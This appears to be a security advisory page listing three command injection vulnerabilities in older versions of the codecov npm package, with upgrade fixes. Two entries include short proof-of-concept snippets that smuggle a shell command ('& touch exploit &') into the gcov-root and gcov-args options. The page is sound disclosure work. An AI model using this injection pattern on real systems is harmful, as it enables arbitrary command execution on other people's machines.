codecov@3.0.2 vulnerabilities

Uploading report to Codecov: https://codecov.io

  • latest version

    3.8.3

  • latest non vulnerable version

  • first published

    9 years ago

  • latest version published

    3 years ago

  • deprecated

    Package is deprecated

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the codecov package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Command Injection

    codecov is a npm package for uploading reports to Codecov.

    Affected versions of this package are vulnerable to Command Injection via the upload method.

    Note: This vulnerability exists due to an incomplete fix of CVE-2020-7597.

    How to fix Command Injection?

    Upgrade codecov to version 3.7.1 or higher.

    <3.7.1
    • M
    Command Injection

    codecov is a npm package for uploading reports to Codecov.

    Affected versions of this package are vulnerable to Command Injection. The value provided as part of the gcov-root argument is executed by the exec function within lib/codecov.js. This vulnerability exists due to an incomplete fix of CVE-2020-7596.

    PoC by JHU System Security Lab

    var root = require("codecov");
    var args = {
      "options": {
        'gcov-root': "& touch exploit &",
        'gcov-exec': ' ',
        'gcov-args': ' '
      }
    }
    root.handleInput.upload(args, function(){}, function(){});
    

    How to fix Command Injection?

    Upgrade codecov to version 3.6.5 or higher.

    <3.6.5
    • M
    Command Injection

    codecov is a npm package for uploading reports to Codecov.

    Affected versions of this package are vulnerable to Command Injection. The value provided as part of the gcov-args argument is executed by the exec function within lib/codecov.js.

    PoC by JHU System Security Lab

    var root = require("codecov");
    var args = {
      "options": {
        'gcov-args': "& touch PWNED &"
      }
    }
    root.handleInput.upload(args, function(){}, function(){});
    

    How to fix Command Injection?

    Upgrade codecov to version 3.6.2 or higher.

    <3.6.2